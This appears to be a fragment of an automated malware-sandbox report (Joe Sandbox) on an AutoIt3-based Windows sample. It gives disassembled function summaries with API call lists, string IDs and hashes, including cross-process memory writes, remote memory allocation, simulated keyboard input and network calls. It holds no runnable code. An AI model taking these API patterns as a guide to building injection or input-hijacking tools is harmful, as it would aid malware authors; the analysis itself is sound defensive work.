                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: 584ef262b0ebc5289be6ebea843ba818118413312f4bec15440027875142f145
                    • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                    • Opcode Fuzzy Hash: 584ef262b0ebc5289be6ebea843ba818118413312f4bec15440027875142f145
                    • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container$%I
                    • API String ID: 3565006973-4251005282
                    • Opcode ID: 5ed104d2ff18c61b51a34f9361201fb114687c1fd7afa2c461df9e804e7132e4
                    • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                    • Opcode Fuzzy Hash: 5ed104d2ff18c61b51a34f9361201fb114687c1fd7afa2c461df9e804e7132e4
                    • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                      • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                    • Instruction ID: 06df28618b400316a62ebb5dd7aba5b0962afb7cd5aceff72fbc56c90cb9ae17
                    • Opcode Fuzzy Hash: 4113f970b40e4ddfad9eaf005de12111c539308e3198b2e3fd8f87d65f62cc15
                    • Instruction Fuzzy Hash: 20518B20B0C50186DB217B24ED2137F2B909B44700F608AABE4D5863AADE3D8DD4DB8E
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: 3cA$_A
                    • API String ID: 4104443479-3480954128
                    • Opcode ID: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                    • Instruction ID: c37b5588275ae9a3f9bfbb083816e01235b481b2fd059d6d91eac45173b7304a
                    • Opcode Fuzzy Hash: 470fd055cd62c062cad60ef6c87f64deccec5063348adfb3c377f09d63a70252
                    • Instruction Fuzzy Hash: 24516B70E006199FDB64CF68C880AAEBBB1FF44304F14852EE85AD7350EB39A995CB55
                    APIs
                      • Part of subcall function 004614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00459296,?,?,00000034,00000800,?,00000034), ref: 004614E6
                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0045983F
                      • Part of subcall function 00461487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004614B1
                      • Part of subcall function 004613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00461409
                      • Part of subcall function 004613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 00461419
                      • Part of subcall function 004613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0045925A,00000034,?,?,00001004,00000000,00000000), ref: 0046142F
                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598AC
                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004598F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                    • String ID: @
                    • API String ID: 4150878124-2766056989
                    • Opcode ID: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                    • Instruction ID: 83720f96416bb9890d74edf788c2ecf3a7fc11859df44560b8e2e1ee8df86db8
                    • Opcode Fuzzy Hash: 25131a85ebe6ddc6b48413ca47e37c1e8c65e46d0e1ba382f06cbd4a7eab333c
                    • Instruction Fuzzy Hash: 8E41627690021CBFDB10DFA5CC41EDEBBB8EB05300F14415AF945B7251DA746E89CBA5
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00487461
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00487475
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00487499
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                    • Instruction ID: a782af31bde95408328e4f00c38aa01da76ea549d3e2a3982252f7da8ca2871c
                    • Opcode Fuzzy Hash: 61045321ac7bf12d5b8baadd1c1317b301de72fcd6e86f1e347c12b9b39caacc
                    • Instruction Fuzzy Hash: CD21D032100218BBDF11DFA4CC42FEE3B69EB48724F210615FE156B190DA79EC918BA4
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00486D3B
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00486D4B
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00486D70
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                    • Instruction ID: 4c3adc306d008ae433eb9b24af907097c824bc429f4b76309dac7fd9fc57b361
                    • Opcode Fuzzy Hash: 751df69c11bbdcf7b5361d053624c448979b1fb0f20ab75c9448d7b30a168b5b
                    • Instruction Fuzzy Hash: 0B21F232600118BFEF129F54CC45FAF3BBAEF89750F028529F940AB2A0C675AC5197A4
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00487772
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00487787
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00487794
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                    • Instruction ID: f92afa797eeb34fec66cc861e9e49cfc52a42a3b8dc3c72e421b2ad803853977
                    • Opcode Fuzzy Hash: 1c29657f45557683d1b312c07fddb74740427be331155a373290d3506167769a
                    • Instruction Fuzzy Hash: 78112732204208BEEF106F61CC01FDF7768EF88B54F21052EFA41A21A0C275F851CB24
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: K$@BL
                    • API String ID: 3494438863-2209178351
                    • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                    • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                    • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                    • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    Similarity
                    • API ID: LocalTime__swprintf
                    • String ID: %.3d$WIN_XPe
                    • API String ID: 2070861257-2409531811
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                    • CharLowerBuffW.USER32(?,?), ref: 0047E101
                      • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                    • _memmove.LIBCMT ref: 0047E314
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 004780C3
                    • CoUninitialize.OLE32 ref: 004780CE
                      • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                    • VariantInit.OLEAUT32(?), ref: 004780D9
                    • VariantClear.OLEAUT32(?), ref: 004783AA
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    APIs
                    • GetWindowRect.USER32(00BA3150,?), ref: 00489863
                    • ScreenToClient.USER32(00000002,00000002), ref: 00489896
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00489903
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    APIs
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                    • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                    • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                    Similarity
                    • API ID: ErrorLast$__itow__swprintfsocket
                    • String ID:
                    • API String ID: 2214342067-0
                    APIs
                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                    • _strlen.LIBCMT ref: 004764D9
                    Similarity
                    • API ID: _strlen
                    • String ID:
                    • API String ID: 4218353326-0
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0046B89E
                    • GetLastError.KERNEL32(?,00000000), ref: 0046B8C4
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0046B8E9
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0046B915
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 0048AB60
                    • GetWindowRect.USER32(?,?), ref: 0048ABD6
                    • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                    • MessageBeep.USER32(00000000), ref: 0048AC57
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    APIs
                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00460C66
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00460D33
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                    • __isleadbyte_l.LIBCMT ref: 00436229
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    APIs
                    • GetForegroundWindow.USER32 ref: 00484F02
                      • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                      • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                      • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                    • GetCaretPos.USER32(?), ref: 00484F13
                    • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                    • GetForegroundWindow.USER32 ref: 00484F54
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • GetCursorPos.USER32(?), ref: 0048C4D2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                    • GetCursorPos.USER32(?), ref: 0048C534
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    APIs
                      • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                      • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                      • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                      • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                      • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                    • _memcmp.LIBCMT ref: 004586C6
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                    • HeapFree.KERNEL32(00000000), ref: 00458703
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 1592001646-0
                    APIs
                    • __setmode.LIBCMT ref: 004209AE
                      • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                      • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                    • _fprintf.LIBCMT ref: 004209E5
                    • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                      • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                    • __setmode.LIBCMT ref: 00420A1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004717A3
                      • Part of subcall function 0047182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                      • Part of subcall function 0047182D: InternetCloseHandle.WININET(00000000), ref: 004718E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    APIs
                    • _free.LIBCMT ref: 00435101
                      • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                      • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                      • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    APIs
                    • _memset.LIBCMT ref: 004044CF
                      • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                      • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                      • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                    • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    APIs
                      • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                      • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                    • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                    • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                    • _memmove.LIBCMT ref: 004763D1
                    • inet_ntoa.WSOCK32(?), ref: 004763DC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
